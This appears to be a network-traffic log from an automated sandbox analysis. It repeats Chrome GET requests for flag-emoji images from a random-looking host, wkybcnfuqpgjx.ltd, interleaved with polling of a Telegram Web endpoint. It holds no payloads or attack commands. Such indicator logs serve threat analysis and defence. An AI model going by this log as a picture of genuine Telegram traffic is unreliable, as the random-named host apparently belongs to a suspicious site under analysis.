Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f4-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1f5.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f5.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f4-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f6-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f7-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f7-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f7-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f7-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f6-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f7-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f7-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1fb-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
